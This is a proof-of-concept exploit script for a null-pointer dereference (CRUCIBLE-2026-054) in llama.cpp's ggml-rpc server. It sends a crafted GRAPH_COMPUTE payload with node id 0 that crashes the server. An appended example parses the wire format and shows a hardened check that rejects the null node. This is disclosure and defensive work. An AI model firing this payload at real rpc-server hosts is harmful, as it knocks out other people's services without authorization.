prof-moody/pocs / poc-054-rpc-graph-null-node.py
#!/usr/bin/env python3
"""
PoC for CRUCIBLE-2026-054: Null Pointer Dereference in RPC graph_compute Node Deserialization

Crashes any ggml-rpc server (rpc-server binary) by sending a GRAPH_COMPUTE message
with a graph node whose ID is 0. The server accepts null nodes when id==0, then
dereferences them via ggml_is_empty() → SIGSEGV.

Usage:
    ./build/bin/rpc-server -p 50052             # terminal 1
    python3 poc-054-rpc-graph-null-node.py      # terminal 2 → server crashes

Tested: llama.cpp HEAD 66c4f9ded (2026-04), release build, Fedora 43 x86_64.
"""
import socket
import struct
import sys
import time

HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 50052

# RPC wire format: cmd (1 byte) + size (8 bytes, little-endian) + data
CMD_GRAPH_COMPUTE = 10
CMD_HELLO = 14


def recv_exact(sock, n):
    """Read exactly n bytes. TCP recv() may return short reads, so loop."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-message")
        buf += chunk
    return buf


def send_msg(sock, cmd, data=b""):
    """Send one framed RPC message: cmd byte, u64 length, body."""
    sock.sendall(struct.pack("<BQ", cmd, len(data)) + data)


s = socket.socket()
s.settimeout(5)
s.connect((HOST, PORT))
print(f"Connected to {HOST}:{PORT}")

# HELLO: zero-length body; the reply body carries the three version bytes
send_msg(s, CMD_HELLO)
resp_size = struct.unpack("<Q", recv_exact(s, 8))[0]
resp_data = recv_exact(s, resp_size)
if len(resp_data) < 3:
    sys.exit(f"unexpected HELLO reply of {len(resp_data)} bytes, is this an rpc-server?")
print(f"RPC version: {resp_data[0]}.{resp_data[1]}.{resp_data[2]}")

# GRAPH_COMPUTE, 30-byte payload: device=0, n_nodes=1, n_tensors=0,
# node[0].id=0 (the trigger). Sent byte-for-byte as captured.
payload = bytes.fromhex(
    "000000000100000000000000000000000000000000000000000000002600"
)
send_msg(s, CMD_GRAPH_COMPUTE, payload)
print(f"Sent GRAPH_COMPUTE ({len(payload)} bytes)")

time.sleep(1)
try:
    resp = s.recv(4096)
    if len(resp) == 0:
        print("CRASH: server closed connection (segfault)")
    else:
        print(f"Server responded ({len(resp)} bytes) - not vulnerable?")
except ConnectionResetError:
    print("CRASH: ConnectionReset")
except socket.timeout:
    # A timeout is not a crash: confirm in the rpc-server terminal before calling it one.
    print("TIMEOUT: no response within 5 s - check the rpc-server terminal")
except OSError as e:
    print(f"CRASH likely: {e}")
finally:
    s.close()
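The framing and the id==0 acceptance that the PoC above relies on, as an added example that is not part of the prof-moody/pocs repository and not ggml-rpc's own code: it frames and parses the cmd + u64-length wire format, decodes the GRAPH_COMPUTE header and node id list with length checks on the attacker-controlled counts, and contrasts a deserializer that lets a zero node id through as a null node with one that rejects it up front. The field order of the GRAPH_COMPUTE body (device, n_nodes, n_tensors, node ids) is taken from the comment in the PoC and is an assumption here; the names `parse_frame`, `parse_graph_compute`, `resolve_nodes` and the `known_ids` table are illustrative, and the trailing bytes of the captured payload are counted, not interpreted.

```python
import struct

# Command numbers as used by the PoC above.
CMD_GRAPH_COMPUTE = 10
CMD_HELLO = 14
HDR = struct.Struct("<BQ")        # cmd (1 byte) + body length (u64 LE)
GC_HDR = struct.Struct("<III")    # device, n_nodes, n_tensors (assumed order, see lead-in)


def build_frame(cmd, body=b""):
    """Frame a message: cmd byte, little-endian u64 length, then the body."""
    return HDR.pack(cmd, len(body)) + body


def parse_frame(buf, max_body=1 << 20):
    """Split one frame off buf; returns (cmd, body, bytes_consumed).

    The length field is attacker controlled, so it is bounded before any
    slicing or allocation is driven by it.
    """
    if len(buf) < HDR.size:
        raise ValueError("truncated frame header")
    cmd, size = HDR.unpack_from(buf, 0)
    if size > max_body:
        raise ValueError(f"declared body {size} exceeds limit {max_body}")
    end = HDR.size + size
    if len(buf) < end:
        raise ValueError("truncated frame body")
    return cmd, bytes(buf[HDR.size:end]), end


def parse_graph_compute(body):
    """Decode the GRAPH_COMPUTE header and node id list.

    Field order follows the comment in the PoC (assumption): device, n_nodes,
    n_tensors, then n_nodes u64 node ids. Tensor records are not decoded; any
    bytes after the id list are only counted. n_nodes is checked against the
    body length before unpacking so a huge count cannot drive a huge read.
    """
    if len(body) < GC_HDR.size:
        raise ValueError("truncated graph_compute header")
    device, n_nodes, n_tensors = GC_HDR.unpack_from(body, 0)
    end = GC_HDR.size + 8 * n_nodes
    if end > len(body):
        raise ValueError(f"n_nodes={n_nodes} does not fit in {len(body)}-byte body")
    node_ids = list(struct.unpack_from(f"<{n_nodes}Q", body, GC_HDR.size))
    return {"device": device, "n_nodes": n_nodes, "n_tensors": n_tensors,
            "node_ids": node_ids, "trailing": len(body) - end}


def resolve_nodes(node_ids, known_ids, hardened=True):
    """Turn node ids into graph entries, or raise.

    hardened=False models the acceptance the PoC relies on: id 0 is let through
    as a null node that a later compute step would dereference.
    hardened=True is the check a fixed deserializer needs: reject id 0 and any
    id the server has never registered, before any node object is touched.
    """
    nodes = []
    for nid in node_ids:
        if nid == 0:
            if hardened:
                raise ValueError("graph node id 0 (null node) rejected")
            nodes.append(None)          # null node survives into the graph
            continue
        if nid not in known_ids:
            raise ValueError(f"unknown tensor id {nid:#x}")
        nodes.append(nid)
    return nodes


# The PoC's 30-byte GRAPH_COMPUTE body, copied from the script above.
POC_BODY = bytes.fromhex(
    "000000000100000000000000000000000000000000000000000000002600"
)


def demo():
    """Run the PoC body through both deserializer variants and report the outcome."""
    frame = build_frame(CMD_GRAPH_COMPUTE, POC_BODY)
    cmd, body, used = parse_frame(frame)
    parsed = parse_graph_compute(body)
    known_ids = set()   # constructed state: no tensors registered in this session
    try:
        resolve_nodes(parsed["node_ids"], known_ids, hardened=True)
        rejected = False
    except ValueError:
        rejected = True
    vulnerable = resolve_nodes(parsed["node_ids"], known_ids, hardened=False)
    return {"cmd": cmd, "consumed": used, "parsed": parsed,
            "hardened_rejected": rejected, "vulnerable_nodes": vulnerable}


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the captured body decoding to a single node with id 0 (plus ten uninterpreted trailing bytes), the hardened path refusing it, and the permissive path returning a graph containing `None`, which is the state the server is in when it reaches ggml_is_empty().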
